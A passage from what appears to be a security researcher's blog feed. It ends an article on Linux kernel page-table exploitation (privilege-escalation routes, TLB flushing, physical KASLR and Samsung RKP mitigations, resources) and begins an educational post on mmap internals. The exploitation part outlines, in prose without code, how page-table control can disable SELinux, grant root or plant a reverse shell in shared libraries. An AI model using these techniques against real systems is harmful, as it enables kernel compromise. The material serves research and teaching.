0xffff888101346010:     0x800000010743c025      0x0000000000000000</code></pre><p>And just like that we&apos;ve walked our <code>mm</code>&apos;s PGD all the way down to a specific PT, containing our 3 mappings: R/W anonymous mapping, RO anonymous mapping and finally a RO file. Sweet!</p><p>I&apos;ll leave the examining of the various attributes, using the PTE diagram from the previous section, as an exercise to any interested readers, as I fear I&apos;ve sidetracked enough. The main goal of this little adventure is to demonstrate how you can get some hands on debugging and poke around to help build your understanding, as it can be vital when working on complex exploitation techniques like this!</p><p>Now, where were we - weighing up our options for exploitation if we have some level of control over a page table... </p><h4 id="approaches">Approaches</h4><p>So, depending on our primitive, here a couple of options we might consider:</p><ul><li>Overwriting the address bits (and maybe Page Size bit for PUD/PMD entries) to gain arbitrary physical address R/W (note, we&apos;ll discus phys KASLR later).</li><li>Overwriting permissions bits to gain R/W on a privileged file that is mapped into our processes virtual address space as read-only.</li></ul><p>Using our kernel AAW we could: disable SELinux, using one of the techniques outlined <a href="https://klecko.github.io/posts/selinux-bypasses">here</a>, such as overwriting the <code>selinux_state</code> singleton<a href="https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux"><sup>[3]</sup></a><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux"><sup>[4]</sup></a>; patch the kernel to gain root (e.g. <code>setresuid()</code>, <code>setresgid()</code>)<a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel"><sup>[5]</sup></a><sup><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail">[6]</a></sup>; overwrite <code>modprobe_path</code> because that&apos;s sometimes still a thing<sup><a href="https://sam4k.com/like-techniques-modprobe_path/">[7]</a></sup>; following the linked lists of tasks from <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched/task.h#L58">init_task</a></code> to elevate the privilege of your own <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/cred.h#L111">cred</a></code>s or forge <code>init</code>&apos;s etc. The world is our oyster (if our primitive is flexible enough...)!</p><p>As for files we might want to target, we could: patch shared libraries used by privileged processes to gain a reverse shell<sup><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso">[8]</a><a href="https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process">[9]</a><a href="https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive">[10]</a></sup>; patch SUID binaries to gain a privileged shell etc.</p><h4 id="on-caching">On Caching</h4><p>Before we get giddy with power, beyond the limitations of our primitive, there a few other things to consider: mitigations (which I&apos;ll cover in the next section) and caching.</p><p>So far we&apos;ve covered paging at a reasonably high level: the process of translating a virtual address to the correct physical address involves walking the appropriate page tables using the bits found in the virtual address. </p><p>This address translation is offloaded to the hardware and is the job of the Memory Management Unit (MMU). As you might imagine, this can get computationally expensive when you scale things up and also inefficient if we&apos;re constantly accessing the same pages of memory. </p><p>To address this, the hardware makes use of various caches, storing address translations (the primary cache for this being the Translation Lookaside Buffer (TLB)) and pages. &#xA0;</p><p>If we start messing with page table entries or pages, in order for the hardware to actual see these changes, we need to flush the appropriate caches so they&apos;re updated with <em>our </em>version. </p><p>Of the write-ups I&apos;ve mentioned so far, the <a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Pagetable article</a> has a <a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#61-how-to-flush-tlb-and-page-table-caches">section</a> on this for aarch64 and <a href="https://pwning.tech/nftables/">Flipping Pages article</a> has a <a href="https://pwning.tech/nftables/#47-tlb-flushing">section</a> rel to x86_64. </p><hr><ol><li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16">https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16</a></li><li><a href="https://lwn.net/Articles/619514/">https://lwn.net/Articles/619514/</a></li><li><a href="https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux">https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux</a></li><li><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux">https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux</a> (aarch64)</li><li><a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel">https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel</a> (aarch64)</li><li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail">https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail</a> (x86_64)</li><li><a href="https://sam4k.com/like-techniques-modprobe_path/">https://sam4k.com/like-techniques-modprobe_path/</a></li><li><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso">https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso</a> (aarch64)</li><li><a href="https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process">https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process</a> (aarch64)</li><li><a href="https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive">https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive</a> (aarch64)</li></ol><h2 id="mitigations">Mitigations</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/05/fun_time_is_over.gif" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="480" height="270"></figure><p>Alright, we&apos;ve had our fun, now it&apos;s time to face reality: mitigations. Of course, one of the perks of page table exploitation is that it sidesteps more common mitigations: virtual KASLR, CFI, doesn&apos;t need <code>modprobe_path</code>, random kmalloc caches and other heap mitigations; not to mention the permissions setup by page tables to protect memory acceses via virtual addresses. However, that&apos;s not to say there&apos;s <em>nothing</em> to worry about. </p><h4 id="physical-kaslr">Physical KASLR</h4><p>As I mentioned earlier, usually when we&apos;re talking about Kernel Address Space Layout Randomisation (KASLR), we&apos;re referring to kernel virtual address randomisation. However, as we&apos;re dealing with physical addresses, we&apos;re interested in physical KASLR.</p><p><code><a href="https://cateee.net/lkddb/web-lkddb/RANDOMIZE_BASE.html">CONFIG_RANDOMIZE_BASE</a></code> is the kernel config option that enables randomising the address of the kernel image (KASLR). Below is the description for the x86_64 option:</p><!--kg-card-begin: markdown--><blockquote>
<p>In support of Kernel Address Space Layout Randomization (KASLR), this randomizes the physical address at which the kernel image is decompressed and the virtual address where the kernel image is mapped, as a security feature that deters exploit attempts relying on knowledge of the location of kernel code internals.</p>
<p><strong>On 64-bit, the kernel physical and virtual addresses are randomized separately.</strong></p>
</blockquote>
<!--kg-card-end: markdown--><p>Now, let&apos;s look at the aarch64 description:</p><blockquote>Randomizes <strong>the virtual address</strong> at which the kernel image is loaded, as a security feature that deters exploit attempts relying on knowledge of the location of kernel internals.</blockquote><p>As far as I understand it, there is no upstream support for physical KASLR on aarch64. That said, if you&apos;re on Android, you&apos;re not out of the woods yet - Samsung have their own physical KASLR implementation, so don&apos;t stop reading just yet. </p><p>For x86_64, the kernel&apos;s physical base address is aligned to <code><a href="https://cateee.net/lkddb/web-lkddb/PHYSICAL_START.html">CONFIG_PHYSICAL_START</a></code> (default being <code>0x1000000</code>). However, the physical address alignment can be explicitly defined by <code><a href="https://cateee.net/lkddb/web-lkddb/PHYSICAL_ALIGN.html">CONFIG_PHYSICAL_ALIGN</a></code>, which is typically set to <code>0x200000</code> (which is the minimum value on x86_64). </p><p>Sooo how we approach this is going to be dependent on our primitive and whether we have control of a PT, PUD, PMD etc. But failing any context specific leaks, the most straightforward approach is simply brute forcing the available physical memory, taking advantage of alignment restrictions, reading the possible base addresses for known signatures either by updating PT entries or mapping huge pages of physical memory and doing it that.</p><h4 id="read-only-memory">Read-Only Memory</h4><p>Another mitigation that can thwart our page-level shenanigans is the use of read-only memory. But Sam, I hear you ask, we&apos;re dealing directly with physical addresses here, who&apos;s going to stop us?! As we&apos;ve mentioned, typically these protections are done during virtual address translation, but we&apos;re bypassing that, so what gives?</p><p>An example of this is Samsung&apos;s Real-time Kernel Protection (RKP), a hypervisor implementation which is part of <a href="https://www.samsungknox.com/en">Samsung KNOX</a>. I don&apos;t want to get too off track here, but essentially the hypervisor runs at a higher privilege level than even the kernel.</p><p>Moreover, it uses a 2 stage address translation to control how the kernel (and thus we) see physical memory. This essentially allows the hypervisor to mark memory as read-only so that even with our physical address read/write, it can still be caught by the hypervisor as it&apos;s operating at a higher privilege. This is a gross simplification, so if you&apos;re interested in reading more, checkout the awesome <a href="https://www.longterm.io/samsung_rkp.html">Samsung RKP Compendium</a>.</p><p>This can in turn be used to protect critical data structures such as SLAB caches (e.g. <code>cred_jar</code>), global variables, kernel page tables etc.</p><p>Note this isn&apos;t currently used (afaik) to protect user page tables, but it does narrow down the options available when exploiting the physical address read/write. </p><h2 id="resources">Resources</h2><p>Below is a list of all the resources I&apos;ve linked throughout the articles and any extras that are relevant to the topic of page table exploitation (if you think I&apos;ve missed any, <a href="https://x.com/sam4k1">lmk</a>!):</p><ol><li><a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel</a> by <a href="https://x.com/NVamous">@NVamous</a> (2023) (aarch64) technique overview with 3 examples</li><li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606">&quot;Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup&quot;</a> by <a href="https://x.com/ptryudai">@ptrYudai</a> (2023) (x86_64) exploit write-up</li><li><a href="https://pwning.tech/nftables/">&quot;Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques&quot;</a> by <a href="https://x.com/notselwyn/">@notselwyn</a> (2024) (x86_64) exploit write-up that expands on the Dirty Pagetable technique, covers phys KASLR bypass, cache flushing</li><li>PageJack (<a href="https://phrack.org/issues/71/13#article">Phrack article</a>, <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">BlackHat slides</a>) (2024) technique overview</li><li><a href="https://powerofcommunity.net/poc2024/Pan%20Zhenpeng%20&amp;%20Jheng%20Bing%20Jhong,%20GPUAF%20-%20Two%20ways%20of%20rooting%20All%20Qualcomm%20based%20Android%20phones.pdf">GPUAF - Two ways of Rooting All Qualcomm based Android phones</a> (2024) (aarch64) exploit slides</li><li><a href="https://i.blackhat.com/BH-US-24/Presentations/REVISED02-US24-Gong-The-Way-to-Android-Root-Wednesday.pdf">The Way to Android Root: Exploiting Your GPU On Smartphone</a> (2024) (aarch64) exploit slides</li><li><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/">CVE-2022-22265 Samsung npu driver</a> (2024) (aarch64) exploit write-up that includes bypasses for Samsung DEFEX</li><li><a href="https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive">Mali-cious Intent: Exploiting GPU Vulnerabilities (CVE-2022-22706 / CVE-2021-39793)</a> (2025) (aarch64) Mali GPU exploitation; demonstrates injecting hooks and payloads into read-only shared libraries</li></ol><p>RE internals and more background reading:</p><ol><li><a href="https://docs.kernel.org/mm/page_tables.html">Page Tables - Linux Kernel Docs</a> are a good place to start on fundamentals</li><li>Checkout my <a href="https://sam4k.com/linternals/">linternal series</a> for rundowns on page allocators and mm basics</li><li><a href="https://syst3mfailure.io/linux-page-allocator/">A Quick Dive Into The Linux Kernel Page Allocator</a> (2025) is a great look into the kernel&apos;s page allocator </li></ol><h2 id="wrapping-up">Wrapping Up</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/05/job_done.gif" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="480" height="226"></figure><p>Boom, we did it! This has been a fun one to write, hopefully it&apos;s, if not fun, been a helpful read for anyone curious about the current trend of page table exploitation.</p><p>It&apos;s part of the broader cat and mouse game of security research, as mitigations catch up and become more widespread, attackers need to get more creative in bypassing or circumventing them completely. Often, this means going deeper and deeper into the internals. As we&apos;ve seen, by exploiting page tables and using physical memory addressing, we&apos;re essentially able to operate &quot;under&quot; the purview of traditional mitigations, such as the permission accesses done at the virtual address level.</p><p>That said, it&apos;s not quite the wild west, as, while not wide spread, mitigations for these techniques do exist. So I wonder where the next stop will be in this mitigations race!</p><p>If you&apos;re interested in digging deeper into page table internals, specifically with regards to kernel code and implementation, I&apos;ll be touching on that in the next part of <a href="https://sam4k.com/linternals/#memory-management">my <code>mm</code> series</a>.</p><p>As always feel free to @me (on <a href="https://twitter.com/sam4k1">X</a>, <a href="https://bsky.app/profile/sam4k.com">Bluesky</a> or less commonly used <a href="https://infosec.exchange/@sam4k">Mastodon</a>) if you have any questions, suggestions or corrections :)</p>]]></content:encoded></item><item><title><![CDATA[Linternals: Exploring The mm Subsystem via mmap [0x02]]]></title><description><![CDATA[In this part we'll use our case study to explore how the Linux kernel maps private anonymous memory.]]></description><link>https://sam4k.com/linternals-exploring-the-mm-subsystem-part-2/</link><guid isPermaLink="false">675f0187de619fc1154efe9b</guid><category><![CDATA[linternals]]></category><category><![CDATA[memory]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Fri, 25 Apr 2025 15:17:34 GMT</pubDate><media:content url="https://sam4k.com/content/images/2025/04/linternals.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2025/04/linternals.gif" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]"><p>Welcome back! <a href="https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/">Last time</a> I left us on a bit of a cliffhanger, rolling the credits just as we were getting into the thick of it, so I&apos;ll keep the intro brief. </p><p>The aim of this series is to explore the inner workings of the Linux kernel&apos;s memory management (mm) subsystem by examining how this simple program is implemented:</p><pre><code class="language-C">#include &lt;sys/mman.h&gt;

int main()
{
    void *addr;

    addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    *(long*)addr = 0x4142434445464748;

    munmap(addr, 0x1000);
    return 0;
}</code></pre><p>While I&apos;m making up the scope of this series as I go (seems fine), the general idea is to cover the mapping, writing and unmapping of memory in detail as the kernel sees it.</p><p>In the <a href="https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/">first part</a> of the series we covered: </p><ul><li>What memory management is and a brief overview of the kernel&apos;s mm subsystem</li><li>What our simple program does from the user&apos;s perspective and how it interacts with the kernel (it&apos;s only like 2 syscalls, how much could there be to cover...)</li><li>The start of our journey: how memory is mapped via the <code>mmap()</code> system call - argument marshalling, fetching the <code>mm_struct</code>, a bit of security, locking - right up until the actual implementation in <code>do_mmap()</code> anyway (sorry, that really was a cliffhanger)</li></ul><p>So without further ado, let&apos;s dive back into how (anonymous) memory is mapped via <code>mmap()</code>!</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/lets_do_this.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="500" height="282"></figure><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#mapping-memory-cont">Mapping Memory (cont.)</a>
<ul>
<li><a href="#what-are-mappings">What Are Mappings?</a>
<ul>
<li><a href="#struct-vmareastruct"><code>struct vm_area_struct</code></a></li>
<li><a href="#mm-mmmt"><code>mm-&gt;mm_mt</code></a></li>
</ul>
</li>
<li><a href="#dommap"><code>do_mmap()</code></a>
<ul>
<li><a href="#finding-a-suitable-addr">Finding A Suitable <code>addr</code></a></li>
</ul>
</li>
<li><a href="#mmapregion"><code>mmap_region()</code></a>
<ul>
<li><a href="#vma-merging">VMA Merging</a></li>
<li><a href="#vma-allocation">VMA Allocation</a></li>
</ul>
</li>
<li><a href="#final-bits">Final Bits</a></li>
<li><a href="#summary">Summary</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="mapping-memory-cont">Mapping Memory (cont.)</h2><p>Broadly speaking, there are 3 things happening in our program: mapping some anonymous memory, writing to it and then unmapping it. Currently, we&apos;re digging into the first part:</p><pre><code class="language-C">addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);</code></pre><p>Let&apos;s quickly recap how deep in the mm subsystem we are, since making our <code>mmap(2)</code> system call from our userspace program. Using gdb we can set a breakpoint on <code>do_mmap()</code>, which is where we left off, and check the backtrace:</p><figure class="kg-card kg-code-card"><pre><code>(gdb) bt
#0  do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flags=34, vm_flags=vm_flags@entry=0, pgoff=0, 
    populate=0xffffc90001a17e80, uf=0xffffc90001a17ea0) at mm/mmap.c:1215
#1  0xffffffff8162aabc in vm_mmap_pgoff (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, len=&lt;optimized out&gt;, 
    prot=&lt;optimized out&gt;, flag=&lt;optimized out&gt;, pgoff=&lt;optimized out&gt;) at mm/util.c:556
#2  0xffffffff816a4d7c in ksys_mmap_pgoff (addr=0, len=4096, prot=3, flags=34, fd=&lt;optimized out&gt;, pgoff=0) at mm/mmap.c:1427
#3  0xffffffff810a894f in __do_sys_mmap (addr=0, off=&lt;optimized out&gt;, len=&lt;optimized out&gt;, prot=&lt;optimized out&gt;, flags=&lt;optimized out&gt;, 
    fd=&lt;optimized out&gt;) at arch/x86/kernel/sys_x86_64.c:93
#4  0xffffffff8100507f in x64_sys_call (regs=regs@entry=0xffffc90001a17f58, nr=nr@entry=9) at arch/x86/entry/syscall_64.c:29
#5  0xffffffff844328b1 in do_syscall_x64 (regs=0xffffc90001a17f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:51
#6  do_syscall_64 (regs=0xffffc90001a17f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:81
#7  0xffffffff84600130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121</code></pre><figcaption>backtrace for our program&apos;s mmap() call (on a 6.11.5 kernel)</figcaption></figure><p>So far these functions have mostly been sanitisting arguments, doing necessary security checks and taking the all important <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mmap_lock.h#L117">mmap_write_lock_killable(mm)</a></code>. </p><p>Before we continue where we left off, about to dive into <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3410">do_mmap()</a></code>, I&apos;m going to touch on some key background which will provide important context for the rest of the post!</p><h3 id="what-are-mappings">What Are Mappings?</h3><p>We probably shouldn&apos;t go much further down the memory mapping rabbit hole without first covering what a mapping is, or at least how the kernel represents them.</p><p>When we call <code><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">mmap()</a></code> in our userspace program, we&apos;re looking to &quot;map&quot; some memory into our virtual address space. This could be a file or some anonymous memory (aka physical memory allocated for us to use), which can then be accessed via a virtual address in our processes&apos; virtual address space. </p><p>So a mapping in this context is essentially a virtual address range which is mapped to some physical memory. We can explore a processes mappings via <code>procfs</code>. Let&apos;s see if we can find our programs <code>0x1000</code> byte mapping:</p><pre><code>$ cat /proc/91280/maps
00400000-00401000 r--p 00000000 00:2b 12253872                           mm_example
00401000-0047c000 r-xp 00001000 00:2b 12253872                           mm_example
0047c000-004a4000 r--p 0007c000 00:2b 12253872                           mm_example
004a4000-004a9000 r--p 000a3000 00:2b 12253872                           mm_example
004a9000-004ab000 rw-p 000a8000 00:2b 12253872                           mm_example
004ab000-004b1000 rw-p 00000000 00:00 0 
15b3e000-15b60000 rw-p 00000000 00:00 0                                  [heap]
7f556e60a000-7f556e60b000 rw-p 00000000 00:00 0 
7f556e60b000-7f556e60d000 r--p 00000000 00:00 0                          [vvar]
7f556e60d000-7f556e60f000 r--p 00000000 00:00 0                          [vvar_vclock]
7f556e60f000-7f556e611000 r-xp 00000000 00:00 0                          [vdso]
7ffd933f4000-7ffd93415000 rw-p 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
</code></pre><p>We can see even our simple program has quite a few mappings, but let&apos;s not get distracted! There, at <code>7f556e60a000</code>, we can see our anonymous mapping! It spans <code>0x1000</code> bytes and has the <code>rw</code> permissions we expect, neat!</p><p>So now we have a general idea of what a mapping is, how exactly does the kernel represent and manage our processes mappings? Queue <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L664">struct vm_area_struct</a></code>!</p><h4 id="struct-vmareastruct"><code>struct vm_area_struct</code></h4><pre><code>/*
 * This struct describes a virtual memory area. There is one of these
 * per VM-area/task. A VM area is any part of the process virtual memory
 * space that has a special rule for the page-fault handlers (ie a shared
 * library, the executable area etc).
 */
struct vm_area_struct {
	union {
		struct {
			/* VMA covers [vm_start; vm_end) addresses within mm */
			unsigned long vm_start;
			unsigned long vm_end;
		};
#ifdef CONFIG_PER_VMA_LOCK
		struct rcu_head vm_rcu;	/* Used for deferred freeing. */
#endif
	};

	struct mm_struct *vm_mm;	/* The address space we belong to. */
	pgprot_t vm_page_prot;          /* Access permissions of this VMA. */

	union {
		const vm_flags_t vm_flags;
		vm_flags_t __private __vm_flags;
	};

#ifdef CONFIG_PER_VMA_LOCK
	/* Flag to indicate areas detached from the mm-&gt;mm_mt tree */
	bool detached;

	int vm_lock_seq;
	struct vma_lock *vm_lock;
#endif

	/*
	 * For areas with an address space and backing store,
	 * linkage into the address_space-&gt;i_mmap interval tree.
	 *
	 */
	struct {
		struct rb_node rb;
		unsigned long rb_subtree_last;
	} shared;

	/*
	 * A file&apos;s MAP_PRIVATE vma can be in both i_mmap tree and anon_vma
	 * list, after a COW of one of the file pages.	A MAP_SHARED vma
	 * can only be in the i_mmap tree.  An anonymous MAP_PRIVATE, stack
	 * or brk vma (with NULL file) can only be in an anon_vma list.
	 */
	struct list_head anon_vma_chain; /* Serialized by mmap_lock &amp;
					  * page_table_lock */
	struct anon_vma *anon_vma;	/* Serialized by page_table_lock */

	/* Function pointers to deal with this struct. */
	const struct vm_operations_struct *vm_ops;

	/* Information about our backing store: */
	unsigned long vm_pgoff;		/* Offset (within vm_file) in PAGE_SIZE
					   units */
	struct file * vm_file;		/* File we map to (can be NULL). */
	void * vm_private_data;		/* was vm_pte (shared mem) */

#ifdef CONFIG_ANON_VMA_NAME
	/*
	 * For private and shared anonymous mappings, a pointer to a null
	 * terminated string containing the name given to the vma, or NULL if
	 * unnamed. Serialized by mmap_lock. Use anon_vma_name to access.
	 */
	struct anon_vma_name *anon_name;
#endif
#ifdef CONFIG_SWAP
	atomic_long_t swap_readahead_info;
#endif
#ifndef CONFIG_MMU
	struct vm_region *vm_region;	/* NOMMU mapping region */
#endif
#ifdef CONFIG_NUMA
	struct mempolicy *vm_policy;	/* NUMA policy for the VMA */
#endif
#ifdef CONFIG_NUMA_BALANCING
	struct vma_numab_state *numab_state;	/* NUMA Balancing state */
#endif
	struct vm_userfaultfd_ctx vm_userfaultfd_ctx;
} __randomize_layout;</code></pre><p>Perhaps understandably, there&apos;s a lot going on here! But this is the structure, referred to as a <code>vma</code>, that describes the virtual memory areas of a process. For example, you can see at the top <code>vm_start</code> and <code>vm_end</code> define the star and end addresses of the vma; just below that <code>vm_mm</code> holds a reference to the <code>mm</code> the vma belongs etc. </p><p>We&apos;ll touch more on each field as it becomes relevant, but I just wanted to introduce the structure here rather than trying to wedge it in when it crops up down the line. </p><h4 id="mm-mmmt"><code>mm-&gt;mm_mt</code></h4><p>Okay, so a vma describes a single memory area, but as we saw, even our little program has quite a few memory areas - how are these all managed? Good question!</p><p>Each process is responsible for tracking its memory areas, and as we know, each process&apos;s memory is managed by a <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">mm_struct</a></code>! So this is where we&apos;ll find our answer:</p><figure class="kg-card kg-code-card"><pre><code>struct mm_struct {
		// SNIP
		struct maple_tree mm_mt;</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">include/linux/mm_types.h</a></figcaption></figure><p>Previously, this would have been <code>struct rb_root mm_rb;</code>, but since 6.1 the kernel moved from red-black trees to the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/maple_tree.h#L219">maple_tree</a></code> data structure for vma management.</p><p>I&apos;m but a humble researcher, so if you&apos;re interested in diving more into maple tree internals, this <a href="https://lwn.net/Articles/845507/">LWN article</a> does a great job introducing maple trees (alternatively, head straight to the <a href="https://docs.kernel.org/core-api/maple_tree.html">kernel docs</a>). Suffice it to say it&apos;s a cache-optimised, low memory footprint data structure ideal for storing non-overlapping ranges - perfect for vmas!</p><p>The key details to highlight are that:</p><ul><li><code>mm_mt</code> is the tree of vmas belonging to the <code>mm_struct</code>&apos;s process,</li><li>A VMA is represented as a node within the tree, but the tree is also able to track gaps between these VMAs (i.e. gaps in the virtual address space)</li><li>The maple tree data structure comes with its own normal and advanced API, but there are also a set of wrapper functions specifically for handling vma maple tree usage</li></ul><h3 id="dommap"><code>do_mmap()</code></h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/so_where_we_were.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="480" height="360"></figure><figure class="kg-card kg-code-card"><pre><code class="language-C">/*
 * The caller must write-lock current-&gt;mm-&gt;mmap_lock.
 */
unsigned long do_mmap(struct file *file, unsigned long addr,
			unsigned long len, unsigned long prot,
			unsigned long flags, vm_flags_t vm_flags,
			unsigned long pgoff, unsigned long *populate,
			struct list_head *uf)
{
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">mm/mmap.c</a></figcaption></figure><p>Okay, let&apos;s get back to it! For some context, upon entering <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">do_mmap()</a></code>:</p><ul><li><code>file</code> is NULL as we&apos;re mapping anonymous memory (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/uapi/asm-generic/mman-common.h#L23">MAP_ANONYMOUS</a></code>), i.e. we&apos;re not mapping a file into our userspace process, but a chunk of &quot;anonymous&quot; physical memory. </li><li><code>vm_flags</code> stores the flags used for the virtual memory mapping we&apos;re creating. In this case, the caller <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575">vm_mmap_pgoff()</a></code> does not specify any flags.</li><li><code>populate</code> is an <code>unsigned long*</code> initialised by <code>do_mmap()</code> and read by the caller, to determine if the mapping should be &quot;populated&quot; before returning to userspace. We&apos;ll touch more on the significance of that later, just know that a mapping is populated when <code>MAP_POPULATE</code> is set and <code>MAP_NONBLOCK</code> is not (so not our case study). </li><li><code>uf</code>, which relates to <code><a href="https://man7.org/linux/man-pages/man2/userfaultfd.2.html">userfaultfd(2)</a></code>, is a linked list initialised by the caller. It&apos;s not touched in <code>do_mmap()</code> and probably out of scope for this series anyway, so we&apos;ll ignore it for now. &#xA0;</li><li><code>addr</code>, <code>len</code>, <code>prot</code>, <code>flags</code>, <code>pgoff</code> all correspond to the same values we passed into <code>mmap(2)</code> from our userspace program. </li></ul><p>Okay, so what&apos;s the goal of this function? We know from exploring the previous functions in the call stack that the return value is the value that <code>mmap(2)</code> returns to userspace: on success, the userspace address of the mapping; on error, the <code>MAP_FAILED</code> value (<code>(void *) -1</code>). &#xA0;So where does <code>do_mmap(2)</code>&apos;s return value come from?</p><figure class="kg-card kg-code-card"><pre><code class="language-C">unsigned long do_mmap(struct file *file, unsigned long addr,
			unsigned long len, unsigned long prot,
			unsigned long flags, vm_flags_t vm_flags,
			unsigned long pgoff, unsigned long *populate,
			struct list_head *uf)
{
	// SNIP
	addr = mmap_region(file, addr, len, vm_flags, pgoff, uf);
	// SNIP
	return addr;
}
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">mm/mmap.c</a></figcaption></figure><p>Hm, so it looks like the rabbit hole goes deeper! <code>do_mmap(2)</code>&apos;s job is to process and sanitise its arguments so that they can be passed to <code>mmap_region(2)</code> which sets up up the actual memory mapping (right??? surely there&apos;s no more calls). </p><p>More specifically, <code>do_mmap()</code> has a few responsibilities, including: </p><ul><li>Sanitising values and performing any necessary checks, such as preventing overflows or stopping the user exceeding the maximum mapping count defined by <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L202">sysctl_max_map_count</a></code>. </li><li>Calculating the correct <code>vm_flags</code>, which are later applied to the <code>struct vm_area_struct</code> created for this mapping, based off of various factors such as <code>prot</code>, <code>flags</code>, <code>mm-&gt;def_flags</code> etc.</li><li>Determining what userspace virtual address, stored in <code>addr</code>, is passed to <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mmap_region()</a></code>.</li></ul><h4 id="finding-a-suitable-addr">Finding A Suitable <code>addr</code></h4><figure class="kg-card kg-image-card"><img 